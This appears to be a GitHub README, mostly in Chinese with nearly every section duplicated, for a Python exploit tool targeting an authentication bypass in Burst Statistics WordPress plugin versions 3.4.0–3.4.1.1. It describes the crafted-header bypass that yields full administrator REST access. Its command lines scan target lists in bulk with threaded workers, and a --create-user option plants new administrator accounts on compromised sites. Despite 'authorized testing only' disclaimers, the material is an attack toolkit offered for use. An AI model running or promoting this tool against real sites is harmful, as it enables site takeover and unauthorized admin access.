
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez.
英文: 用于 Burst Statistics 认证绕过的 授权安全测试 的受控 PoC 和简要技术说明。
土耳其语: Burst Statistics 插件中身份验证绕过的 授权安全测试 用受控 PoC 和简要技术总结。
注意: WordPress.org 上的 200,000+ 活跃安装 数字是插件的 用户总数,不表示每个站点都运行 有漏洞的版本。实际影响需要检查 版本 + 环境(HTTP / 应用程序密码可用性等)。
注意: WordPress.org 上的 200,000+ 活跃安装 数字是插件的 用户总数;不意味着所有站点都运行 有漏洞的版本。实际影响需验证 版本 + 环境(HTTP、应用程序密码适用性等)。
GitHub风格的Markdown不能在仓库中没有文件的情况下嵌入二进制 GIF。上面的 Typing SVG 片段(CDN)模拟了动画。要添加自己的屏幕录制:

GitHub Markdown 不支持在没有文件的情况下嵌入 GIF。上面的 Typing SVG(CDN)提供文字动画。对于自己的演示:

flowchart LR
A[客户端请求] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|错误处理分支| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: 完全管理员上下文]
flowchart LR
A[请求] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|错误分支| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: 完全管理员上下文]
使用 -f 时,-o 与 --output-dir 互斥。
在 -f 模式下 -o 与 --output-dir 不能同时使用。
pip3 install requests urllib3
# 单个站点,报告文件
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# 单个站点 + 新管理员(实验室)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# 批量 + 合并文件(仅成功)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# 批量 + 每主机文件到文件夹(仅成功)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# 单个站点,报告
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# 单个站点 + 新管理员(实验室)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# 批量 + 合并文件(仅成功)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# 批量 + 文件夹中每站点文件(仅成功)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: 字段 / 空密码行成功的绕过 不会泄露受害者用户的真实密码 — PoC 中的 Basic 密码是 伪造的。除非 --create-user 创建了 新 账户(然后生成的密码会被写入),否则 Password: 行保持为空。
成功的绕过 不会泄露现有用户的真实密码 — PoC 中的 Basic 密码是 伪造的。除非 --create-user 创建了 新 账户,否则 Password: 行保持为空;如果创建,则写入生成的密码。
仅用于 书面授权 的评估和 您自己的实验室。未经授权的使用在许多司法管辖区 非法。作者及本 README 维护者对于误用 不承担任何责任。
仅供 书面授权 的评估和 您自己的实验室 使用。未经授权的使用在许多国家 是非法的。作者及本 README 编辑者对于误用 不承担任何责任。
| 字段 | 详情 |
|---|
| 内容 | Burst Statistics 中的 认证绕过(CWE-287):精心构造的标头可将 REST 请求提升至 完全管理员上下文。 |
| 版本 | 受影响: 3.4.0、3.4.1、3.4.1.1 · 建议使用: 3.4.2 或更新版本 |
| 严重性 | CVSS ~9.8(严重);在适用条件下可远程、无需认证利用。 |
| 本仓库 | CVE-2026-8181.py — 实验室自动化:单目标、批量列表、线程池、选择性 TXT 输出。 |
| 字段 | 详情 |
|---|
| 内容 | Burst Statistics 的 身份验证绕过(CWE-287)。通过自定义标头在 REST 请求中实现 完全管理员上下文。 |
| 版本 | 受影响: 3.4.0、3.4.1、3.4.1.1 · 建议使用: 3.4.2 或更新版本 |
| 严重性 | CVSS ~9.8(严重);在适当条件下可远程、无需认证利用。 |
| 本仓库 | CVE-2026-8181.py — 实验室自动化:单目标、列表扫描、线程池、选择性 TXT 输出。 |
| 特性 | 描述 |
|---|
| 单目标 | -u 基础 URL |
| 批量目标 | -f targets.txt(每行一个 URL;# 注释) |
| 并发 | -j N 个工作线程(有上限) |
| 合并文件 | -o file.txt — 配合 -f,仅附加成功利用 |
| 每主机文件 | --output-dir — 仅成功者 获得 host.txt(失败跳过) |
| 新管理员 | --create-user — 通过 REST 创建随机用户(密码随后出现在报告中) |
| TLS(实验室) | -k 禁用证书验证(仅用于受信任的实验室) |
| 特性 | 描述 |
|---|
| 单目标 | -u 根地址 |
| 多目标 | -f targets.txt(每行一个 URL;# 注释) |
| 并行 | -j N 个工作线程(有上限) |
| 单个文件 | -o dosya.txt — 配合 -f,仅成功利用 追加 |
| 文件夹输出 | --output-dir — 仅成功者 获得 host.txt |
| 新管理员 | --create-user — 通过 REST 创建随机用户(密码在报告中) |
| TLS(实验室) | -k 关闭证书验证(仅用于受信任的实验室) |